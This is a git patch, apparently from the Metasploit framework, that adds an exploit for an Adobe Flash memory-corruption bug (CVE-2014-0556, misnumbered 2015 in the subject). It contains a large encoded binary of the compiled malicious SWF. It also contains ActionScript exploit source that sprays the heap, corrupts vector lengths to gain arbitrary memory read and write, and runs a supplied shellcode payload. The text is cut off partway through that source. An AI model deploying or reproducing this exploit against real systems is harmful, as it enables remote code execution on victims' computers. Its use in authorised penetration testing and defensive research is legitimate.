From 28fac60c81491b5de51a57a3e287a24896833004 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 15 Apr 2015 14:08:16 -0500 Subject: [PATCH] Add module for CVE-2015-0556 --- data/exploits/CVE-2014-0556/msf.swf | Bin 0 -> 17750 bytes .../source/exploits/CVE-2014-0556/Main.as | 182 ++++++++++++++++++ .../adobe_flash_copy_pixels_to_byte_array.rb | 110 +++++++++++ 3 files changed, 292 insertions(+) create mode 100755 data/exploits/CVE-2014-0556/msf.swf create mode 100755 external/source/exploits/CVE-2014-0556/Main.as create mode 100644 modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf new file mode 100755 index 0000000000000000000000000000000000000000..24cfc1a53a7059bf76a4ac9d555d0657792e63a7 GIT binary patch literal 17750 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⪙T(%j&=0b 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/framework/libs) to the AIRSDK folder (/framework/libs) +// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) +// 4. Build with: mxmlc -o msf.swf Main.as + +// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/ +// Modified to be used from msf + +package +{ + import flash.display.Sprite + import flash.display.BitmapData + import flash.geom.Rectangle + import flash.utils.ByteArray + import flash.display.LoaderInfo + import mx.utils.Base64Decoder + + public class Main extends Sprite + { + private var bv:Vector. = new Vector.(12800) + private var uv:Vector. = new Vector.(12800) + private var bd:BitmapData = new BitmapData(128, 16) + private var i:uint = 0 + + public function Main() + { + var b64:Base64Decoder = new Base64Decoder() + b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var payload:String = b64.toByteArray().toString() + + for (i = 0; i < bv.length; i++) { + bv[i] = new ByteArray() + bv[i].length = 0x2000 + bv[i].position = 0xFFFFF000 + } + + for (i = 0; i < bv.length; i++) + if (i % 2 == 0) bv[i] = null + + for (i = 0; i < uv.length; i++) { + uv[i] = new Vector.(1022) + } + + bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401]) + + for (i = 0; ; i++) + if (uv[i].length == 0xffffffff) break + + for (var i2:uint = 1; i2 < uv.length; i2++) { + if (i == i2) continue + uv[i2] = new Vector.(1014) + uv[i2][0] = bv[6401] + uv[i2][1] = this + } + + uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000 + bv[6401].endian = "littleEndian" + bv[6401].length = 0x500000 + var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000 + var main:uint = uv[i][0xfffffc09] - 1 + var vtable:uint = vector_read(main) + vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 